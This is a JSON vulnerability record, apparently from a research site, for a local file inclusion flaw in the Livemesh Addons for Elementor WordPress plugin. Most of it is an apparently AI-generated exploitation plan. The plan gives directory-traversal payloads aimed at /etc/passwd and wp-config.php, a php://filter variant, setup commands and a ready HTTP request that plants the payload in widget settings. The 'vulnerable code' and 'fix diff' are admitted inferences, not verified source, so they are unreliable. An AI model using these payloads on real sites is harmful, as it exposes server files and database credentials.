[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fsyPovtsa_yCO4L2ryTEJRL4zRqMCccpQ8_yxhWRebbo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"source_links":31},"CVE-2026-1620","livemesh-addons-by-elementor-authenticated-contributor-local-file-inclusion-via-widget-template-parameter","Livemesh Addons by Elementor \u003C= 9.0 - Authenticated (Contributor+) Local File Inclusion via Widget Template Parameter","The Livemesh Addons for Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 9.0. This is due to insufficient sanitization of the template name parameter in the `lae_get_template_part()` function, which uses an inadequate `str_replace()` approach that can be bypassed using recursive directory traversal patterns. 
This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary local files on the server via the widget's template parameter, provided they can trick an administrator into performing an action or into installing Elementor.","addons-for-elementor",null,"\u003C=9.0","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Control of Filename for Include\u002FRequire Statement in PHP Program ('PHP Remote File Inclusion')","2026-04-15 17:56:59","2026-04-16 06:44:51",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2483875a-84de-4a40-a69e-aee68da1ce3b?source=api-prod",[],"researched",false,3,"This research plan outlines the steps to exploit **CVE-2026-1620**, a Local File Inclusion (LFI) vulnerability in the **Livemesh Addons by Elementor** plugin.\n\n---\n\n### 1. Vulnerability Summary\nThe vulnerability exists in the `lae_get_template_part()` function. This function is designed to load template files for various widgets. It attempts to prevent directory traversal by using `str_replace()` to remove `..\u002F` sequences. However, this implementation is non-recursive. An attacker can use a payload like `....\u002F\u002F`, which, after a single pass of `str_replace('..\u002F', '', $payload)`, results in `..\u002F`, effectively bypassing the security check. Because the resulting path is used in a PHP `include` or `require` statement, a Contributor-level user can include arbitrary files from the server.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** The vulnerability is triggered when a widget that uses `lae_get_template_part()` is rendered. 
This typically happens via the standard WordPress frontend or Elementor's preview\u002Fediting mode.\n*   **Vulnerable Parameter:** The `template` or `style` parameter within a Livemesh widget's configuration (stored in Elementor's `_elementor_data` post meta).\n*   **Authentication:** Contributor-level access is required to create\u002Fedit posts and insert Elementor widgets.\n*   **Preconditions:** \n    1.  The plugin **Livemesh Addons by Elementor** (slug: `addons-for-elementor`) version $\\le$ 9.0 must be installed.\n    2.  **Elementor** must be installed and active.\n    3.  The attacker must have a user account with at least `Contributor` privileges.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** A user with Contributor permissions creates or edits an Elementor-enabled post.\n2.  **Widget Configuration:** The user adds a Livemesh widget (e.g., \"Services\" or \"Posts Grid\").\n3.  **Data Storage:** Elementor saves the widget settings as a JSON object in the `_elementor_data` meta field of the post.\n4.  **Rendering Sink:** When the post is viewed or previewed, the widget's `render()` method is called.\n5.  **Vulnerable Call:** The `render()` method calls `lae_get_template_part($slug, $name)`.\n6.  **The Flaw:** Inside `lae_get_template_part()`:\n    ```php\n    \u002F\u002F Inferred logic based on vulnerability description\n    $name = str_replace('..\u002F', '', $name); \n    $template_file = LAE_PLUGIN_DIR . \"templates\u002F{$slug}-{$name}.php\";\n    include( $template_file );\n    ```\n7.  **Bypass:** By providing `$name` as `....\u002F\u002F....\u002F\u002F....\u002F\u002F....\u002F\u002Fetc\u002Fpasswd`, the `str_replace` turns it into `..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd`.\n\n### 4. Nonce Acquisition Strategy\nElementor saves and previews use specific nonces. However, as a Contributor, you can simply use the WordPress dashboard to create a post.\n\n1.  
**Identify Script:** The plugin likely localizes data in `lae-settings-data` or similar.\n2.  **Create Content:** \n    ```bash\n    wp post create --post_type=post --post_status=publish --post_author=CONTRIBUTOR_ID --post_title=\"LFI Test\"\n    ```\n3.  **Browser Access:** Log in as the Contributor and navigate to the post editor.\n4.  **Extract Nonce:** If the save operation requires an Elementor-specific nonce, use:\n    ```javascript\n    \u002F\u002F In browser_eval\n    window.elementorCommon?.api?.utils?.getNonce() || window.elementorConfig?.nonces?.save_builder\n    ```\n\n*Note: For a simple LFI trigger, once the post meta is updated via WP-CLI or the editor, simply viewing the post (no nonce required) will trigger the inclusion.*\n\n### 5. Exploitation Strategy\nWe will use a Contributor account to inject the LFI payload into a widget's settings.\n\n**Step 1: Create a Post and identify the Widget**\nWe will target the \"Services\" widget (slug: `lae-services`).\n\n**Step 2: Update Post Meta with Payload**\nWe will inject a traversal string into the `template` or `style` parameter of the widget JSON.\nPayload: `....\u002F\u002F....\u002F\u002F....\u002F\u002F....\u002F\u002F....\u002F\u002F....\u002F\u002Fetc\u002Fpasswd` (Assuming the plugin appends `.php`, we might need to target a known file or use a path that resolves despite the extension).\n\n**Step 3: Trigger the Inclusion**\nPerform an `http_request` to the post URL.\n\n### 6. Test Data Setup\n1.  **Users:** Create a contributor user.\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n    ```\n2.  **Plugin Config:** Ensure Elementor is set up to allow Contributors to edit posts (default behavior).\n3.  **Target Post:** Create a post that will host the widget.\n    ```bash\n    wp post create --post_type=post --post_title=\"LFI Trigger\" --post_status=publish --post_author=attacker\n    ```\n\n### 7. 
Expected Results\nIf successful, the response body of the HTTP request to the post will contain the contents of the target file (e.g., `\u002Fetc\u002Fpasswd`).\n\n### 8. Verification Steps\n1.  **Check Meta:** Verify the payload was successfully injected into the database.\n    ```bash\n    wp post meta get [POST_ID] _elementor_data\n    ```\n2.  **Verify Output:** Check if the `\u002Fetc\u002Fpasswd` content (like `root:x:0:0:root`) is present in the HTML response.\n\n### 9. Alternative Approaches\nIf `\u002Fetc\u002Fpasswd` fails due to the `.php` extension being appended by the plugin:\n*   **Attempt Path Traversal to Log Files:** Try including `\u002Fvar\u002Flog\u002Fapache2\u002Faccess.log` or `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-config.php` (if the plugin appends `.php`, including `wp-config` without the extension might work).\n*   **Payload Modification:** Try `....\u002F\u002F....\u002F\u002F....\u002F\u002F....\u002F\u002Fwp-config` (resulting in `..\u002F..\u002F..\u002F..\u002Fwp-config.php`).\n*   **Wrapper Technique:** If the input allows, try PHP filters: `php:\u002F\u002Ffilter\u002Fconvert.base64-encode\u002Fresource=....\u002F\u002F....\u002F\u002F....\u002F\u002Fwp-config`.\n\n### HTTP Request Payload (Example)\nTo update the post with the malicious widget data using the REST API (if available) or by simulating the Elementor save:\n\n```http\nPOST \u002Fwp-json\u002Felementor\u002Fv1\u002Fdata\u002F [POST_ID] HTTP\u002F1.1\nContent-Type: application\u002Fjson\nX-WP-Nonce: [ELEMENTOR_NONCE]\n\n{\n  \"status\": \"publish\",\n  \"data\": [\n    {\n      \"id\": \"random_id\",\n      \"elType\": \"widget\",\n      \"widgetType\": \"lae-services\",\n      \"settings\": {\n        \"style\": \"....\u002F\u002F....\u002F\u002F....\u002F\u002F....\u002F\u002F....\u002F\u002Fetc\u002Fpasswd\"\n      }\n    }\n  ]\n}\n```\n\n*Final Action: Navigate to `\u002F?p=[POST_ID]` and observe the inclusion.*","The Livemesh Addons for Elementor plugin is 
vulnerable to Local File Inclusion due to an insecure non-recursive directory traversal filter in the `lae_get_template_part()` function. Authenticated attackers with Contributor-level access can bypass the `str_replace('..\u002F', '', $name)` check by using the `....\u002F\u002F` pattern, allowing them to include arbitrary local files via widget template parameters.","\u002F\u002F Inferred from plugin architecture and vulnerability description\nfunction lae_get_template_part( $slug, $name = null ) {\n    if ( isset( $name ) ) {\n        \u002F\u002F Vulnerable non-recursive replacement\n        $name = str_replace( '..\u002F', '', $name );\n    }\n\n    $template = '';\n\n    if ( $name ) {\n        $template = LAE_PLUGIN_DIR . \"templates\u002F{$slug}-{$name}.php\";\n    } else {\n        $template = LAE_PLUGIN_DIR . \"templates\u002F{$slug}.php\";\n    }\n\n    if ( file_exists( $template ) ) {\n        include( $template );\n    }\n}","--- a\u002Fincludes\u002Fhelper-functions.php\n+++ b\u002Fincludes\u002Fhelper-functions.php\n@@ -5,7 +5,7 @@\n function lae_get_template_part( $slug, $name = null ) {\n \tif ( isset( $name ) ) {\n-\t\t$name = str_replace( '..\u002F', '', $name );\n+\t\t$name = sanitize_text_field( wp_basename( $name ) );\n \t}\n \n \t$template = '';","1. Authenticate as a WordPress user with Contributor-level privileges or higher.\n2. Create a new post or edit an existing one using the Elementor editor.\n3. Add a Livemesh Addons widget to the page (e.g., the 'Services' widget).\n4. Capture the request to save the Elementor data (usually a POST request to `\u002Fwp-json\u002Felementor\u002Fv1\u002Fdata\u002F[POST_ID]`).\n5. Modify the JSON payload in the `_elementor_data` field. Locate the widget's settings and change the 'style' or 'template' parameter to a traversal string using recursive patterns (e.g., `....\u002F\u002F....\u002F\u002F....\u002F\u002F....\u002F\u002Fwp-config`).\n6. 
Save the changes and navigate to the published post's URL.\n7. The plugin will process the `....\u002F\u002F` sequence into `..\u002F`, resolve the path to `wp-config.php`, and include it during the page rendering process.","gemini-3-flash-preview","2026-04-16 15:23:10","2026-04-16 15:23:31",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faddons-for-elementor\u002Ftags"]